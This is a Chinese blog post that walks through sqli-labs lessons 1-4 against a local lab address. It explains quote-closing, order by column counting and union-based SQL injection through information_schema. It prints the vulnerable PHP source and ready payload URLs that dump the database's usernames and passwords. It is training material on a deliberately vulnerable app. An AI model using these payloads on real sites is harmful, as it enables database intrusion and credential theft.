sql-lab注入基础(1-4)

博主： alexsel
发布时间：2019 年 08 月 02 日
1117 次浏览
暂无评论
6740字数
分类：网络安全

SQL注入基础

在sql语句中

select * from users id=1 and 1=1;
select * from users id=1 && 1=1;
select * from users id=1 & 1=1;

其中第一个和第二个是一样的，表达的意思是id=1条件和1=1条件进行与运算。

第三个的意思是id=1条件与1进行&位操作,id=1被当作true，与1进行&操作运算结果还是1，

再进行=操作，1=1还是1（&的优先级大于=）

注入流程

数据库-->数据表-->列-->数据项

我们的数据库存储的数据按照上图的形式，一个数据库中有很多的数据表，数据表中有很多的列，每一列中存储着数据。我们注入的过程就是先拿到数据库名，在获取到当前数据库名下的数据表，在获取当前数据表下的列，最后获取数据。

练习

select table_name from information_schema.tables where table_schema = "security";

Mysql有一个系统数据库information_schema，储存着所有数据库的相关信息，一般的，我们利用该表可以进行一次完整的注入。以下为一般的流程。

猜数据库
select schema_name from information_schema.schemata;
猜某库的数据表
select table_name from information_schema.tables where table_schema='xxxx';
猜某表的所有列
select column_name from information_schema.columns where table_name='xxxx';
获取某列的内容
select *** from ***;

Less-1

我们首先在id=1后面添加一个'来查看一下效果：

从上述的错误中，我们可以看到提交到sql中的1'在经过sql语句构造后形成'1'' LIMIT 0,1，后面多加了一个'。这种方式就是从错误信息中得到我们所需要的信息，那我们接下来就要想，怎么把多余的'去掉。

我们尝试'or 1=1--+，此时我们构造的语句就成了

select *** where '1' or 1=1--+'LIMIT 0,1

可以看到没有报错。

接下来我么可以利用order by进行测试。order by对前面的数据进行排序，这里有三列数据，我们在这里只能测试到order by 3超过3就会报错。

我们从源码中分析一下为什么会造成注入

if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    ......
}

我们可以看到注入语句为SELECT * FROM users WHERE id='$id' LIMIT 0,1";，id参数在拼接sql语句的时候，未对id进行任何的过滤操作，所以当提交'or 1=1 --+，直接构造的语句就是SELECT * FROM users WHERE id='1' or 1=1 --+LIMIT 0,1;，这条语句因or 1=1所以为永真。

此外，此处我们再介绍一下union联合注入，union的作用是将两个sql语句进行联合。union可以从下面的例子中看看出，强调一点：union前后两个sql语句要相同才可以。union all与union的区别是增加了去重的功能。我们这里根据上述的知识，进行information_schema知识的应用。

http://192.168.252.148/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+

当id的数据在数据库中不存在的时候，（此时我们可以id=-1，两个sql语句进行联合操作时，当前一个语句选择的内容为空，我们这里就将后面语句的内容显示出来）此时页面中显示了我们构造的union的数据。

接下来我们暴数据库，我们可以看到其中被我们控制的字段是2和3这两个字段，所以我们就在这两个中进行数据的查询。

http://192.168.252.148/sqli-labs/Less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

此时的sql语句为:

SELECT * FROM users WHERE id='-1' union select 1,group_concat(schma_name),3 from information_schema.schemata --+ LIMIT 0,1;

接下来就是暴表的操作，这里我们将security转为16进制，我们也可以使用table_schema = 'security'来进行表的筛选。

http://192.168.252.148/sqli-labs/Less-1/
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 0x7365637572697479 --+

暴表中相应的字段名，这里的判断已经成了table_name = users

http://192.168.252.148/sqli-labs/Less-1/
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 0x7573657273 --+

此时的sql语句是

SELECT * from users WHERE id='-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 0x7573657273 --+ LIMIT 0,1;

数据表中的字段我们知道了，那我们就可以暴列了

http://192.168.252.148/sqli-labs/Less-1/
?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

我们还可以逐id来显示

Less-2

第二关是数字型

http://192.168.252.148/sqli-labs/Less-2/
?id=1' and 1=1 --+

http://192.168.252.148/sqli-labs/Less-2/
?id=1 and 1=1 --+

判断出是数字型之后，我们就直接可以按照之前的步骤来做了

暴库
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
暴表
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 0x7365637572697479 --+
暴字段
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 0x7573657273 --+
暴列
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(username),group_concat(password) from users --+

我们查看源码

if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    ......
}

我们分析源码可以知道，这里没有对接收的id加单引号，所以直接使用数字即可。

Less-3

这一关中，我们输入了'之后，我们发现有提示：

我们根据提示我们可以得知，这次的闭合使用代码格式是id = ('$id')，那我们可以尝试使用')来闭合

这样一来，我们又可以得到用户名和密码，同时后面的查询也被注释掉了。

我们看一下源代码：

if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    ......
}

这种情况下可以成功注入的有
') or '1'=('1'
) or 1=1 --+

剩下的步骤就是我们之前进行的步骤，将'替换为')即可。

Less-4

首先我们尝试'，没有报错

然后接着尝试id = 1 and 1=2，没有报错

我们再尝试')，没有报错

当我们输入"的时候，产生了错误

我们根据错误进行判断，我们需要使用")来进行闭合。所以我们使用?id=1") --+来尝试。

这样一来，我们又可以重复之前的步骤了，我们看一下源码：

if(isset($_GET['id']))
{
    $id=$_GET['id'];
    $id = '"' . $id . '"';
    $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    ......
}

我们可以看到在源码中，我们对接收到的id进行了两个"的拼接，而且在查询语句中也使用了)，所以可以成功注入的有

") or "1"=("1
") or 1=1 --+

最后修改：2020 年 08 月 26 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

10种方法绕过云锁以及tamper
浏览次数: 4977
PHP_Session反序列化漏洞
浏览次数: 4015
红队实验七
浏览次数: 2957
Bypass-云锁绕过
浏览次数: 2945
Linux提权总结
浏览次数: 2506

111
师傅好文章，图片坏了好多
Ulysses
不过最新版的云锁已经不能用这种方法绕过了⌇●﹏●⌇
Ulysses
真榜！学到了ヾ(≧∇≦*)ゝ
未尽
感谢师傅提供的思路，能否给个收款码，请师傅喝杯咖啡。

Mssql提权
浏览次数: 2286
php反序列化pop链构造
浏览次数: 1871
Mysql数据操作
浏览次数: 1165
权限维持分析及防御
浏览次数: 856
Java反序列化CommonsCollections1分析
浏览次数: 569

sql-lab注入基础(1-4)

alexsel • 2019 年 08 月 02 日

<h3>SQL注入基础</h3>在<code>sql</code>语句中<pre><code class="lang-sql">select * from users id=1 and 1=1;
select * from users id=1 &amp;&amp; 1=1;
select * from users id=1 &amp; 1=1;</code></pre>其中第一个和第二个是一样的，表达的意思是<code>id=1</code>条件和1=1条件进行与运算。第三个的意思是<code>id=1</code>条件与1进行&位操作,<code>id=1</code>被当作<code>true</code>，与1进行&操作运算结果还是1，再进行=操作，1=1还是1（&的优先级大于=）注入流程数据库--&gt;数据表--&gt;列--&gt;数据项我们的数据库存储的数据按照上图的形式，一个数据库中有很多的数据表，数据表中有很多的列，每一列中存储着数据。我们注入的过程就是先拿到数据库名，在获取到当前数据库名下的数据表，在获取当前数据表下的列，最后获取数据。练习<pre><code class="lang-sql">select table_name from information_schema.tables where table_schema = &quot;security&quot;;</code></pre><img src="https://www.helloimg.com/images/2020/08/25/194c2de17f2a2beff.png" alt="" title="" style=""><code>Mysql</code>有一个系统数据库<code>information_schema</code>，储存着所有数据库的相关信息，一般的，我们利用该表可以进行一次完整的注入。以下为一般的流程。<pre><code class="lang-sql">猜数据库
select schema_name from information_schema.schemata;
猜某库的数据表
select table_name from information_schema.tables where table_schema='xxxx';
猜某表的所有列
select column_name from information_schema.columns where table_name='xxxx';
获取某列的内容
select *** from ***;</code></pre><h3>Less-1</h3>我们首先在<code>id=1</code>后面添加一个<code>'</code>来查看一下效果：<img src="https://www.helloimg.com/images/2020/08/25/2d81304f1c7eb4bea.png" alt="" title="" style="">从上述的错误中，我们可以看到提交到sql中的<code>1'</code>在经过sql语句构造后形成<code>'1'' LIMIT 0,1</code>，后面多加了一个<code>'</code>。这种方式就是从错误信息中得到我们所需要的信息，那我们接下来就要想，怎么把多余的<code>'</code>去掉。我们尝试<code>'or 1=1--+</code>，此时我们构造的语句就成了<pre><code class="lang-sql">select *** where '1' or 1=1--+'LIMIT 0,1</code></pre><img src="https://www.helloimg.com/images/2020/08/25/3e8bb99fcac9bc740.png" alt="" title="" style="">可以看到没有报错。接下来我么可以利用<code>order by</code>进行测试。<code>order by</code>对前面的数据进行排序，这里有三列数据，我们在这里只能测试到<code>order by 3</code>超过3就会报错。<img src="https://www.helloimg.com/images/2020/08/25/4f06add163bc42802.png" alt="" title="" style="">我们从源码中分析一下为什么会造成注入<pre><code class="lang-php">if(isset($_GET['id']))
{
 $id=$_GET['id'];
 $sql=&quot;SELECT * FROM users WHERE id='$id' LIMIT 0,1&quot;;
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);
 ......
}</code></pre>我们可以看到注入语句为<code>SELECT * FROM users WHERE id='$id' LIMIT 0,1&quot;;</code>，<code>id</code>参数在拼接sql语句的时候，未对<code>id</code>进行任何的过滤操作，所以当提交<code>'or 1=1 --+</code>，直接构造的语句就是<code>SELECT * FROM users WHERE id='1' or 1=1 --+LIMIT 0,1;</code>，这条语句因<code>or 1=1</code>所以为永真。此外，此处我们再介绍一下<code>union</code>联合注入，<code>union</code>的作用是将两个<code>sql</code>语句进行联合。<code>union</code>可以从下面的例子中看看出，强调一点：<code>union</code>前后两个<code>sql</code>语句要相同才可以。<code>union all</code>与<code>union</code>的区别是增加了去重的功能。我们这里根据上述的知识，进行<code>information_schema</code>知识的应用。<pre><code class="lang-sql">http://192.168.252.148/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+</code></pre>当<code>id</code>的数据在数据库中不存在的时候，（此时我们可以<code>id=-1</code>，两个<code>sql</code>语句进行联合操作时，当前一个语句选择的内容为空，我们这里就将后面语句的内容显示出来）此时页面中显示了我们构造的<code>union</code>的数据。<img src="https://www.helloimg.com/images/2020/08/25/50575dae82461d4d9.png" alt="" title="" style="">接下来我们暴数据库，我们可以看到其中被我们控制的字段是<code>2</code>和<code>3</code>这两个字段，所以我们就在这两个中进行数据的查询。<pre><code class="lang-sql">http://192.168.252.148/sqli-labs/Less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+</code></pre><img src="https://www.helloimg.com/images/2020/08/25/615218ca3927981c3.png" alt="" title="" style="">此时的<code>sql</code>语句为:<pre><code class="lang-sql">SELECT * FROM users WHERE id='-1' union select 1,group_concat(schma_name),3 from information_schema.schemata --+ LIMIT 0,1;</code></pre>接下来就是暴表的操作，这里我们将<code>security</code>转为16进制，我们也可以使用<code>table_schema = 'security'</code>来进行表的筛选 。<pre><code class="lang-sql">http://192.168.252.148/sqli-labs/Less-1/
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 0x7365637572697479 --+</code></pre><img src="https://www.helloimg.com/images/2020/08/25/7d9d2fc64799e91d6.png" alt="" title="" style="">暴表中相应的字段名，这里的判断已经成了<code>table_name = users</code><pre><code class="lang-sql">http://192.168.252.148/sqli-labs/Less-1/
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 0x7573657273 --+</code></pre><img src="https://www.helloimg.com/images/2020/08/25/83c0580d0607ced90.png" alt="" title="" style="">此时的sql语句是<pre><code class="lang-sql">SELECT * from users WHERE id='-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 0x7573657273 --+ LIMIT 0,1;</code></pre>数据表中的字段我们知道了，那我们就可以暴列了<pre><code class="lang-sql">http://192.168.252.148/sqli-labs/Less-1/
?id=-1' union select 1,group_concat(username),group_concat(password) from users --+</code></pre><img src="https://www.helloimg.com/images/2020/08/25/9c7a6a9da33e44d5c.png" alt="" title="" style="">我们还可以逐<code>id</code>来显示<img src="https://www.helloimg.com/images/2020/08/25/101e5ab1ad0a9ab0ad.png" alt="" title="" style=""><h3>Less-2</h3>第二关是数字型<pre><code class="lang-sql">http://192.168.252.148/sqli-labs/Less-2/
?id=1' and 1=1 --+</code></pre><img src="https://www.helloimg.com/images/2020/08/25/116832095b7bf2ec5f.png" alt="" title="" style=""><pre><code class="lang-sql">http://192.168.252.148/sqli-labs/Less-2/
?id=1 and 1=1 --+</code></pre><img src="https://www.helloimg.com/images/2020/08/25/12b44aaa8985e83818.png" alt="" title="" style="">判断出是数字型之后，我们就直接可以按照之前的步骤来做了<pre><code class="lang-sql">暴库
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
暴表
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 0x7365637572697479 --+
暴字段
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 0x7573657273 --+
暴列
http://192.168.252.148/sqli-labs/Less-2/
?id=-1 union select 1,group_concat(username),group_concat(password) from users --+</code></pre>我们查看源码<pre><code class="lang-php">if(isset($_GET['id']))
{
 $id=$_GET['id'];
 $sql=&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;;
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);
 ......
}</code></pre>我们分析源码可以知道，这里没有对接收的<code>id</code>加单引号，所以直接使用数字即可。<h3>Less-3</h3>这一关中，我们输入了<code>'</code>之后，我们发现有提示：<img src="https://www.helloimg.com/images/2020/08/25/1313594773ab5c9ee7.png" alt="" title="" style="">我们根据提示我们可以得知，这次的闭合使用代码格式是<code>id = ('$id')</code>，那我们可以尝试使用<code>')</code>来闭合<img src="https://www.helloimg.com/images/2020/08/25/14138114365a002518.png" alt="" title="" style="">这样一来，我们又可以得到用户名和密码，同时后面的查询也被注释掉了。我们看一下源代码：<pre><code class="lang-php">if(isset($_GET['id']))
{
 $id=$_GET['id'];
 $sql=&quot;SELECT * FROM users WHERE id=('$id') LIMIT 0,1&quot;;
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);
 ......
}</code></pre><pre><code class="lang-sql">这种情况下可以成功注入的有
') or '1'=('1'
) or 1=1 --+</code></pre>剩下的步骤就是我们之前进行的步骤，将<code>'</code>替换为<code>')</code>即可。<h3>Less-4</h3>首先我们尝试<code>'</code>，没有报错<img src="https://www.helloimg.com/images/2020/08/25/15701ab40fbc85ed8b.png" alt="" title="" style="">然后接着尝试<code>id = 1 and 1=2</code>，没有报错<img src="https://www.helloimg.com/images/2020/08/25/16e66ab591c9b98f46.png" alt="" title="" style="">我们再尝试<code>')</code>，没有报错<img src="https://www.helloimg.com/images/2020/08/25/17f7dcd954c77e6949.png" alt="" title="" style="">当我们输入<code>&quot;</code>的时候，产生了错误<img src="https://www.helloimg.com/images/2020/08/25/18e0bb3411dbbad784.png" alt="" title="" style="">我们根据错误进行判断，我们需要使用<code>&quot;)</code>来进行闭合。所以我们使用<code>?id=1&quot;) --+</code>来尝试。<img src="https://www.helloimg.com/images/2020/08/25/19604937f31d3d16e3.png" alt="" title="" style="">这样一来，我们又可以重复之前的步骤了，我们看一下源码：<pre><code class="lang-sql">if(isset($_GET['id']))
{
 $id=$_GET['id'];
 $id = '&quot;' . $id . '&quot;';
 $sql=&quot;SELECT * FROM users WHERE id=($id) LIMIT 0,1&quot;;
 $result=mysql_query($sql);
 $row = mysql_fetch_array($result);
 ......
}</code></pre>我们可以看到在源码中，我们对接收到的<code>id</code>进行了两个<code>&quot;</code>的拼接，而且在查询语句中也使用了<code>)</code>，所以可以成功注入的有<pre><code class="lang-sql">&quot;) or &quot;1&quot;=(&quot;1
&quot;) or 1=1 --+</code></pre>

SQL注入基础

Less-1

Less-2

Less-3

Less-4

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

sql-lab注入基础(1-4)

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款